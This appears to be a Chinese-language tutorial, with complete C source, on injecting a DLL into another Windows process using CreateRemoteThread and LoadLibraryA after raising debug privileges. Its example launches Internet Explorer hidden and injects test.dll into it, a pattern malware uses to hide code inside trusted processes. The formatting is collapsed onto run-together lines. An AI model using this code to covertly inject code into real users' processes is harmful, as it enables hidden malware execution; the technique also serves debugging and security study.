线程注入dll

#define WINAPI __stdcall#define CALLBACK __stdcall#define WINAPIV __cdecl#define APIENTRY WINAPI#define APIPRIVATE __stdcall#define PASCAL __stdcall

CreateRemote Thread() LoadLibreary() Thread() VirtualAllocEx()线程注入基本步骤1.提升权限通常为DEBUG2.调用OpenProcess函数打开目标进程,返回进程句柄3.申请空间,写入要注入的DLL名,返回内存空间首地址4.调用GetProcAddress函数得到LoadLibrary函数地址5.调用CreateRemoteThread函数创建并启动线程现在逐个解决首先,提升权限int EnableDebugPriv(const char * name) //提升进程为DEBUG权限{HANDLE hToken;TOKEN_PRIVILEGES tp;LUID luid;if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken) ){printf("OpenProcessToken error\n");return 1;}if(!LookupPrivilegeValue(NULL,name,&luid)){printf("LookupPrivilege error!\n");}tp.PrivilegeCount = 1;tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;tp.Privileges[0].Luid = luid;if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) ){printf("AdjustTokenPrivileges error!\n");return 1;}return 0;}该函数用于提升进程为DEBUG权限,函数入口为进程名2.接下来,得到进程句柄OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId) //取得所有权3.现在就开始向系统申请所需内存空间char *pszLibFileRemote;pszLibFileRemote=(char *)VirtualAllocEx( hRemoteProcess,NULL, lstrlen(DllFullPath)+1,MEM_COMMIT, PAGE_READWRITE);if(pszLibFileRemote==NULL){printf("VirtualAllocEx error\n");return FALSE;}if(WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void *)DllFullPath,lstrlen(DllFullPath)+1,NULL) == 0){printf("WriteProcessMemory error\n");return FALSE;}在往后就是得到LoadLibraryA 函数地址PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");if(pfnStartAddr == NULL){printf("GetProcAddress error\n");return FALSE;}最后就是启动线程了呵呵if( (hRemoteThread = CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))==NULL){printf("CreateRemoteThread error\n");return FALSE;}return TRUE;}以下是完整源代码头文件:#include <windows.h>#include <tlhelp32.h>#include <stdio.h>#ifndef FUN_H#define FUN_Hint EnableDebugPriv(const char * name) //提升进程为DEBUG 权限{HANDLE hToken;TOKEN_PRIVILEGES tp;LUID luid;//打开进程令牌环if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken) ){printf("OpenProcessToken error\n");return 1;}//获得进程本地唯一IDif(!LookupPrivilegeValue(NULL,name,&luid)){printf("LookupPrivilege error!\n");}tp.PrivilegeCount = 1;tp.Privileges[0].Attributes =SE_PRIVILEGE_ENABLED;tp.Privileges[0].Luid = luid;//调整进程权限if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) ){printf("AdjustTokenPrivileges error!\n");return 1;}return 0;}BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId) //注入函数{HANDLE hRemoteProcess;//获得调试权限if(EnableDebugPriv(SE_DEBUG_NAME)){printf("add privilege error");return FALSE;}//打开目标进程if((hRemoteProcess=OpenProcess(PROCESS_ALL_ACCESS,FALSE,dwRemoteProcessId))==NULL){printf("OpenProcess error\n");return FALSE;}char *pszLibFileRemote;//申请存放dll 文件名的路径pszLibFileRemote=(char *)VirtualAllocEx( hRemoteProcess,NULL, lstrlen(DllFullPath)+1,MEM_COMMIT, PAGE_READWRITE);if(pszLibFileRemote==NULL){printf("VirtualAllocEx error\n");return FALSE;}//把dll 的完整路径写入到内存，if(WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(void *)DllFullPath,lstrlen(DllFullPath)+1,NULL) == 0){printf("WriteProcessMemory error\n");return FALSE;}//得到LoadLibraryA 函数地址PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryA");if(pfnStartAddr == NULL){printf("GetProcAddress error\n");return FALSE;}HANDLE hRemoteThread;//启动远程线程if( (hRemoteThread = CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL))==NULL){printf("CreateRemoteThread error\n");return FALSE;}return TRUE;}DWORD GetProcessID(char *ProcessName) //获得进程PID{PROCESSENTRY32 pe32;pe32.dwSize=sizeof(pe32);//获得系统内所有进程快照HANDLE hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);if(hProcessSnap==INVALID_HANDLE_VALUE){printf("CreateToolhelp32Snapshot error");return 0;}//枚举列表中的第一个进程BOOL bProcess=Process32First(hProcessSnap,&pe32);while(bProcess){//比较找到的进程名和我们要查找的进程名，一样则返回进程idif(strcmp(strupr(pe32.szExeFile),strupr(ProcessName))==0)return pe32.th32ProcessID;//继续查找bProcess=Process32Next(hProcessSnap,&pe32);}CloseHandle(hProcessSnap);return 0;}#endif主函数文件:#include "fun.h"int APIENTRY WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nCmdShow){char Path[255];char DllPath[255];//得到widnows 系统路径GetSystemDirectory(Path,sizeof(Path));//0x00截断字符，得到盘符Path[3]=0x00;//得到IE 带路径文件名strcat(Path,"Program Files\\Internet Explorer\\iexplore.exe");//启动IE，为了防止系统中没有 IE进程WinExec(Path,SW_HIDE);//暂停两秒，等待IE 启动Sleep(2000);//得到IE 进程DWORD Pid=GetProcessID("iexplore.exe");//得到程序自身路径GetCurrentDirectory(sizeof(DllPath),DllPath);//得到DLL 带路径文件名strcat(DllPath,"\\test.dll");//注入IE 进程InjectDll(DllPath,Pid);return 0;}另外有个东西本进程的LoadLibrary 函数地址可以这样获得PTHREAD_START_ROUTINEp=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("kernel32")),"LoadLibraryA");该函数成功返回句柄,否则返回零蛋